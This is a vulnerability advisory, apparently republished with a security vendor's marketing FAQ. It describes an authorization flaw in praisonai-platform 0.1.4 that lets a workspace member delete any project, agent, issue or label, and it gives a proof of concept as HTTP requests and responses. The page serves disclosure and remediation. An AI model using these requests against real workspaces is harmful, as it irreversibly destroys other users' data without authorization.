Summary
A workspace member can permanently delete any resource, projects, agents, issues, labels, issue dependencies, and issue-label attachments, created by the workspace owner or other members. All six content DELETE endpoints enforce workspace membership but perform no ownership or role check. A single malicious or compromised member account can wipe an entire workspace's content irreversibly.
Details
The published role capability matrix explicitly restricts members from modifying others' content:
| Capability | Owner | Admin | Member |
|---|---|---|---|
| Create issues/tasks | ✅ | ✅ | ✅ |
| Edit own content | ✅ | ✅ | ✅ |
| Edit others' content | ✅ | ✅ | ❌ |
The DELETE handlers for all content resources check that the requesting user is a workspace member, but do not verify that the user either created the resource or holds an owner/admin role. The result is that the member role has unrestricted DELETE access over all workspace content regardless of who created it.
Confirmed vulnerable endpoints:
| Endpoint | Expected | Actual |
|---|---|---|
DELETE /api/v1/workspaces/{workspace_id}/projects/{project_id} |
403 | 204 |
DELETE /api/v1/workspaces/{workspace_id}/agents/{agent_id} |
403 | 204 |
DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id} |
403 | 204 |
DELETE /api/v1/workspaces/{workspace_id}/labels/{label_id} |
403 | 204 |
DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id}/dependencies/{dep_id} |
403 | 204 |
DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id}/labels/{label_id} |
403 | 204 |
The missing check is isolated to content resource DELETEs.
PoC
Requirements: Two accounts, owner (resource creator) and member (attacker).
1. Register both accounts
POST /api/v1/auth/register
Content-Type: application/json
{"email": "[email protected]", "password": "Password1!", "name": "owner"}
POST /api/v1/auth/register
Content-Type: application/json
{"email": "[email protected]", "password": "Password1!", "name": "member"}
2. Owner creates workspace, adds member with member role
POST /api/v1/workspaces/
Authorization: Bearer <owner_token>
Content-Type: application/json
{"name": "Test Workspace"}
POST /api/v1/workspaces/{workspace_id}/members
Authorization: Bearer <owner_token>
Content-Type: application/json
{"user_id": "<member_user_id>", "role": "member"}
3. Owner creates a project
POST /api/v1/workspaces/{workspace_id}/projects/
Authorization: Bearer <owner_token>
Content-Type: application/json
{"title": "Owner's Project"}
Response 201 Created:
{"id": "29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6", "title": "Owner's Project", ...}
4. Member deletes the owner's project
DELETE /api/v1/workspaces/{workspace_id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <member_token>
Response: 204 No Content
5. Owner confirms the project is permanently gone
GET /api/v1/workspaces/{workspace_id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <owner_token>
Response: 404 Not Found
{"detail": "Project not found"}
The same steps reproduce on all six affected resource types (agents, issues, labels, issue dependencies, issue-label attachments).
Impact
This is an improper authorization vulnerability. A workspace member can delete resources (projects, agents, issues, labels) created by other workspace members or the owner. The documented permission model restricts members to managing only their own content, the DELETE endpoints do not enforce this.
Who is impacted: Workspace owners and members who share a workspace with untrusted or compromised member accounts.
GHSA-RH39-9C67-59MH has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.1.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-RH39-9C67-59MH? GHSA-RH39-9C67-59MH is a high-severity security vulnerability in praisonai-platform (pip), affecting versions = 0.1.4. It is fixed in 0.1.6.
- How severe is GHSA-RH39-9C67-59MH? GHSA-RH39-9C67-59MH has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of praisonai-platform are affected by GHSA-RH39-9C67-59MH? praisonai-platform (pip) versions = 0.1.4 is affected.
- Is there a fix for GHSA-RH39-9C67-59MH? Yes. GHSA-RH39-9C67-59MH is fixed in 0.1.6. Upgrade to this version or later.
- Is GHSA-RH39-9C67-59MH exploitable, and should I be worried? Whether GHSA-RH39-9C67-59MH is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-RH39-9C67-59MH is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-RH39-9C67-59MH? Upgrade
praisonai-platformto 0.1.6 or later.